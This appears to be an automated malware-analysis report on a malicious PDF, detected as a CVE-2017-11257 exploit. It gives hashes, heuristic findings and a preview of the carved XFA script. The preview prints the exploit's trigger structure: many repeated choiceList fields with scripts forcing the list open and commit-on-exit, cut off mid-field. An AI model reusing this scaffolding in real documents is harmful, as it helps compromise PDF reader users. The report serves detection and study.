Malicious PDF — malware analysis report

Static analysis result for SHA-256 9c47ea827633586c…

MALICIOUS

PDF

852.5 KB First seen: 2022-07-02
MD5: bd98506aa3642484fe7b37fc54c0939f SHA-1: b4cadd572e5b48e37c7dd0bdd39b0762f15d5c59 SHA-256: 9c47ea827633586c84487b3987908b5404e890a579f566c182029962490e61f3
296 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 9

  • XFA form contains risky executable script high CVE related PDF_XFA_SCRIPT
    PDF embeds an XFA form whose script block contains exploit, submission/launch, or shell-execution primitives. Ordinary LiveCycle print/update scripts are left as generic XFA/JS signals unless stronger behavior is present.
  • ClamAV: Pdf.Exploit.CVE_2017_11257-6335577-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.CVE_2017_11257-6335577-0
  • XFA JavaScript heap-spray exploit code critical PDF_XFA_HEAP_SPRAY
    PDF contains XFA script content with heap-spray or shellcode-like JavaScript markers such as large encoded word sequences, util.pack, large arrays, or spray variable names. This is a weaponised Adobe Reader exploit pattern, not a normal interactive form.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded script payload in PDF stream medium PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ In PDF document text
    • http://www.xfa.org/schema/xci/3.0/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.8/In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_pdf_script_0004f0cd.bin pdf-embedded-script PDF raw stream script payload at offset 0x4F0CD 441885 bytes
SHA-256: 3447f7d080011f32258a4c98ac268f9d7e65382c31d7f62a07ef6482a11356e0
Preview script
First 1,000 lines of the extracted script
<?xml version='1.0'?>
<xdp:xdp xmlns:xdp='http://ns.adobe.com/xdp/'>
<config xmlns:xfa='http://www.xfa.org/schema/xci/3.0/'>
<present>
<pdf>
<interactive>1</interactive>
<scriptModel>XFA</scriptModel>
<tagged>1</tagged>
<encryption>
<permissions>
<accessibleContent>1</accessibleContent>
<contentCopy>1</contentCopy>
<documentAssembly>1</documentAssembly>
<formFieldFilling>1</formFieldFilling>
<modifyAnnots>1</modifyAnnots>
<print>1</print>
<printHighQuality>1</printHighQuality>
<change>1</change>
<plaintextMetadata>1</plaintextMetadata>
</permissions>
</encryption>
</pdf>
</present>
<acrobat>
<acrobat7>
<dynamicRender>required</dynamicRender>
</acrobat7>
</acrobat>
</config>

<template xmlns="http://www.xfa.org/schema/xfa-template/2.8/">
	<subform name="form1" layout="tb" locale="en_US" restoreState="auto">
		<pageSet>
			<pageArea name="page1" id="Page1">
				<contentArea x="0.25in" y="0.25in" w="200mm" h="200mm"/>
					<medium stock="a4" short="100mm" long="100mm"/>
					<subform w="100mm" h="100mm">
						<bind match="none"/>
												<field name="field0" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
								<script contentType="application/x-javascript">
									$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";
									$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";
								</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field1" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field2" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field3" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field4" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field5" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field6" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field7" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field8" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field9" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field10" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field11" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field12" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field13" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field14" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field15" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field16" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field17" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field18" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field19" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field20" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field21" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field22" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field23" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field24" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field25" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field26" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field27" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field28" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field29" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field30" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field31" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field32" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field33" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field34" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
							<margin topInset="1mm" bottomInset="1mm" leftInset="1mm" rightInset="1mm"/>
							<caption placement="top" reserve="5mm">
								<para vAlign="middle"/>
								<value>
									<text>hello</text>
								</value>
							</caption>
							<bind match="none"/>
						</field>						<field name="field35" y="1mm" x="1mm" w="1mm" h="1mm">
							<ui>
								<choiceList>
<script contentType="application/x-javascript">$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#open).rawValue="always";$xfa.resolveNode(xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#choiceList[0].#commitOn).rawValue="exit";</script>
								<border></border>
								<margin/>
								</choiceList>
							</ui>
							<font typeface="Myriad Pro"/>
